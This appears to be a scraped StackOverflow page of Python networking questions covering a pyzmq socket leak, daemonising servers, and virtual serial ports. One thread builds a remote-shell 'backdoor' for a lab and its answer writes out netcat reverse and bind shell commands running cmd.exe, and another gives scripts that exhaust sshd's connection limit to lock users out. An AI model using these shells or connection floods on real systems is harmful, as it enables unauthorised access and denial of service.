socket handle leak in pyzmq? - python

Hi good people of StackOverflow.
I'm using pyzmq and I've got some long-running processes, which led to a discovery that socket handles are being left open. I've narrowed the offending code down to the following:
import zmq
uri = 'tcp://127.0.0.1'
sock_type = zmq.REQ
linger = 250
# Observe output of lsof -p <pid> here and see no socket handles
ctx = zmq.Context.instance()
sock = ctx.socket(sock_type)
sock.setsockopt(zmq.LINGER, linger)
port = sock.bind_to_random_port(uri)
# Observe output of lsof -p <pid> here and see many socket handles
sock.close() # lsof -p <pid> still showing many socket handles
ctx.destroy() # Makes no difference
pyzmq version is pyzmq-13.1.0
Either there is a bug in pyzmq, or I'm doing something incorrectly. I hope you can help me!!
Thanks!

After a chat with pieterh and minrk on #zeromq, we found the cause.
ctx.destroy() in 13.1.0 has an indentation bug so it only calls Context.term() if there is an unclosed socket.
Workaround: call ctx.term() instead, and make sure all of your sockets are closed before you do.

Related

How to move SimpleSocket server into a background process

I have a simple socketServer that works perfectly on the main thread.
#Server PORT
PORT = 8020
#reassign variables
Handler = Server #this is a SimpleHTTPHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
httpd.serve_forever()
I need to have this run in the background and have the ability to stop the process at will. What is the proper way to do this?
EDIT
Sorry I was unclear. I need to have the server running non stop and I can only access the system from SSH so I can't just start it and walk away.
Assuming you are running your script on a POSIX operating system and your script is named socket_server.py, you can use nohup like this:
$ nohup python socket_server.py >> /dev/null 2>&1 &
That will put your script in the background, make it immune to hangups, and you can exit your SSH session. The shell will print out the job number and PID:
$ [1] 1234
You can stop it later by getting sending a SIGTERM using kill:
$ kill -SIGTERM 1234
You might need threading/_thread
def server():
....
import _thread
_thread.start_new_thread(server, ())
This basically starts the server function on a different thread.
EDIT:
In this case in your def server(): you a global variable threadIsRunning, if this is valued to True it should continue, but if it is valued to False run thread.exit() this should all be in some sort of loop.

SSH Max Connection Ruby Script Not Working Properly

Most sshd installs have a default limit of 10 connections. If you exceed this, all users who attempt to connect to the server will receive the error ssh_exchange_identification: Connection closed by remote host. This can be demonstrated with the simple bash onliner for i in {0..12}; do nc targetserver.com 22 & done. I also wrote a python script to demonstrate this:
#!/usr/bin/env python
import socket
socks=[]
print "Building sockets. . ."
for i in range(20):
socks.append(socket.socket(2,1))
socks[i].connect(('localhost',22))
while 1:
pass
print "Done."
which works perfectly. I then attempted to create the same script using ruby:
#!/usr/bin/env ruby
require 'socket'
socks = Array.new(20)
puts "Building sockets...\n"
for i in 0..19
socks[i] = TCPSocket.new('localhost', 22)
end
puts "Done.\n"
while (true) do
end
The ruby script does not get any errors and prints the expected output, but does not result in preventing other users from connecting to ssh. I verified that the ruby script is creating sockets with another python script I wrote:
#!/usr/bin/python
from socket import socket as sock, SO_REUSEADDR as REUSE, SOL_SOCKET as SOL
host='localhost'
port=5555
s=sock(2,1)
s.setsockopt(SOL, REUSE, 1)
s.bind((host,port))
s.listen(port)
i=0
while 1:
s.accept()
i += 1
print i
And changing to destination port to 5555.
The only thing that comes to mind is that the sockets might be closing but I do not know why this would be. Is there anything else that would prevent this script from working?

python script starting 2 daemons

My plan is to provide a script just as the title states. I've got an idea which I'll descibe below. If you think something sounds bad/stupid, I'd be grateful for any constructive comments, improvements, etc.
There are 2 services I want to start as daemons. One is required (a caching service), one is optional (http access to the caching service). I use argparse module to get --port to get caching service port and optional --http-port to get http access. I already have this and it works. Now I'd like to start the daemons. THe services are based on twisted, so they have to start the reactor loop. So far I would like to have two different processes: one for the service and second one for http access (though I know it might be done in a single async process).
Since starting twisted service is done via reactor loop (which is python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command line command to start the process). I can use os.fork to start daemons and touch service.pid and http.pid files, but I don't know how to access the child pid, since os.fork returns 0 for the child.
So the chld PID is what I'm missing. Moreover, if anything seems illogical or overcomplicated, please comment on that.
My current code looks like this:
#!/usr/bin/python
import argparse
import os
from twisted.internet import reactor
parser = argparse.ArgumentParser(description='Run PyCached server.')
parser.add_argument('port', metavar='port', type=int,
help='PyCached service port')
parser.add_argument('--http-port', metavar='http-port', type=int, default=None,
help='PyCached http access port')
args = parser.parse_args()
def dumpPid(name):
f = open(name + '.pid', 'w')
f.write(str(os.getpid()))
f.flush()
f.close()
def erasePid(name):
os.remove(name + '.pid')
def run(name, port, factory):
dumpPid(name)
print "Starting PyCached %s on port %d" % (name, port)
reactor.listenTCP(port, factory)
reactor.run()
erasePid(name)
print "Successfully stopped PyCached %s" % (name,)
# start service (required)
fork_pid = os.fork()
if fork_pid == 0:
from server.service import PyCachedFactory
run('service', args.port, PyCachedFactory())
else:
# start http access (optional)
if args.http_port:
fork_pid = os.fork()
if fork_pid == 0:
from server.http import PyCachedSite
addr = ('localhost', args.port)
run('http', args.http_port, PyCachedSite(addr))
else:
pass
I run it with:
./run.py 8001 # with main service only
or:
./run.py 8001 --http-port 8002 # with additional http
System shutdown is done via single shell script:
#!/bin/bash
function close {
f="$1.pid"
if [ -f "$f" ]
then
kill -s SIGTERM `cat "$f"`
fi
}
close http
close service
Since starting twisted service is done via reactor loop (which is python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command line command to start the process).
You should use twistd. If not, then you should write a Python script for launching the daemon. Then you should use the subprocess module (or reactor.spawnProcess) to launch the child process.
Using os.fork without immediately proceeding to one of the os.exec* functions is broken. A large amount of state is shared between the parent and child created by os.fork. You can't be sure that this sharing won't break something (and I can tell you it will break some things in Twisted).
Here are some links to discussions of fork-without-exec issues that might help you get more of an idea of what a troublesome area this is.
Twisted epoll reactor issues - https://twistedmatrix.com/pipermail/twisted-python/2013-October/027611.html
stdlib ssl security issues - https://mail.python.org/pipermail/python-dev/2013-October/129834.html
is twisted incompatible with multiprocessing events and queues?
multiprocessing memory usage and twisted/gevents

python subprocess stdin.write a string error 22 invalid argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Virtual Serial Device in Python?

I know that I can use e.g. pySerial to talk to serial devices, but what if I don't have a device right now but still need to write a client for it? How can I write a "virtual serial device" in Python and have pySerial talk to it, like I would, say, run a local web server? Maybe I'm just not searching well, but I've been unable to find any information on this topic.
this is something I did and worked out for me so far:
import os, pty, serial
master, slave = pty.openpty()
s_name = os.ttyname(slave)
ser = serial.Serial(s_name)
# To Write to the device
ser.write('Your text')
# To read from the device
os.read(master,1000)
If you create more virtual ports you will have no problems as the different masters get different file descriptors even if they have the same name.
If you are running Linux you can use the socat command for this, like so:
socat -d -d pty,raw,echo=0 pty,raw,echo=0
When the command runs, it will inform you of which serial ports it has created. On my machine this looks like:
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/12
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/13
2014/04/23 15:47:49 socat[31711] N starting data transfer loop with FDs [3,3] and [5,5]
Now I can write to /dev/pts/13 and receive on /dev/pts/12, and vice versa.
I was able to emulate an arbitrary serial port ./foo using this code:
SerialEmulator.py
import os, subprocess, serial, time
# this script lets you emulate a serial device
# the client program should use the serial port file specifed by client_port
# if the port is a location that the user can't access (ex: /dev/ttyUSB0 often),
# sudo is required
class SerialEmulator(object):
def __init__(self, device_port='./ttydevice', client_port='./ttyclient'):
self.device_port = device_port
self.client_port = client_port
cmd=['/usr/bin/socat','-d','-d','PTY,link=%s,raw,echo=0' %
self.device_port, 'PTY,link=%s,raw,echo=0' % self.client_port]
self.proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(1)
self.serial = serial.Serial(self.device_port, 9600, rtscts=True, dsrdtr=True)
self.err = ''
self.out = ''
def write(self, out):
self.serial.write(out)
def read(self):
line = ''
while self.serial.inWaiting() > 0:
line += self.serial.read(1)
print line
def __del__(self):
self.stop()
def stop(self):
self.proc.kill()
self.out, self.err = self.proc.communicate()
socat needs to be installed (sudo apt-get install socat), as well as the pyserial python package (pip install pyserial).
Open the python interpreter and import SerialEmulator:
>>> from SerialEmulator import SerialEmulator
>>> emulator = SerialEmulator('./ttydevice','./ttyclient')
>>> emulator.write('foo')
>>> emulator.read()
Your client program can then wrap ./ttyclient with pyserial, creating the virtual serial port. You could also make client_port /dev/ttyUSB0 or similar if you can't modify client code, but might need sudo.
Also be aware of this issue: Pyserial does not play well with virtual port
It may be easier to using something like com0com (if you're on Windows) to set up a virtual serial port, and develop on that.
Maybe a loop device will do the job if you need to test your application without access to a device. It's included in pySerial 2.5 https://pythonhosted.org/pyserial/url_handlers.html#loop
It depends a bit on what you're trying to accomplish now...
You could wrap access to the serial port in a class and write an implementation to use socket I/O or file I/O. Then write your serial I/O class to use the same interface and plug it in when the device is available. (This is actually a good design for testing functionality without requiring external hardware.)
Or, if you are going to use the serial port for a command line interface, you could use stdin/stdout.
Or, there's this other answer about virtual serial devices for linux.

Categories

Resources